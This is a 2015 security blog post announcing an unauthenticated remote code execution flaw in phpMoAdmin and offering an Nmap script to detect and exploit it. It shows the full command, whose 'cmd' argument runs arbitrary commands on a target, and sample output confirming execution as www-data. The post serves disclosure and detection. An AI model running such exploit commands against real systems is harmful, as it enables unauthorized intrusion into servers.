An 0-day vulnerability has been posted on Full-Disclosure this morning. It affects the MongoDB GUI phpMoAdmin. The GUI is similar to the well-known phpMyAdmin and allows the DB administrator to perform maintenance tasks on the MongoDB databases with the help of a nice web interface. The vulnerability is critical because it allows to perform remote code execution without being authenticated. All details are available in this Full-Disclosure post.
I wrote a quick and dirty Nmap script which tests the presence of a phpMoAdmin page and tries to exploit the vulnerability. The script can be used as following:
# nmap -sC --script=http-phpmoadmin \
  --script-args='http-phpmoadmin.uri=/moadmin.php \
http-phpmoadmin.cmd=id' \
<target>
Example of output:
# nmap -sC --script=http-phpmoadmin --script-args='http-phpmoadmin.uri=/moadmin.php' \ -p 80 www.target.com Starting Nmap 6.47SVN ( http://nmap.org ) at 2015-03-04 09:45 CET Nmap scan report for www.target.com (192.168.2.1) Host is up (0.027s latency). rDNS record for 192.168.2.1: www.target.com PORT STATE SERVICE 80/tcp open http | http-phpmoadmin: |_Output for 'id':uid=33(www-data) gid=33(www-data) groups=33(www-data) Nmap done: 1 IP address (1 host up) scanned in 0.52 seconds
The script is available here. Install it in your “$NMAP_HOME/share/nmap/scripts/” directory and enjoy!
RT @xme: [/dev/random] #phpMoAdmin 0-day #Nmap Script http://t.co/l5i2VGqsQe
RT @xme: [/dev/random] #phpMoAdmin 0-day #Nmap Script http://t.co/l5i2VGqsQe
RT @xme: [/dev/random] #phpMoAdmin 0-day #Nmap Script http://t.co/l5i2VGqsQe
RT @xme: [/dev/random] #phpMoAdmin 0-day #Nmap Script http://t.co/l5i2VGqsQe
RT @xme: [/dev/random] #phpMoAdmin 0-day #Nmap Script http://t.co/l5i2VGqsQe
RT @xme: [/dev/random] #phpMoAdmin 0-day #Nmap Script http://t.co/l5i2VGqsQe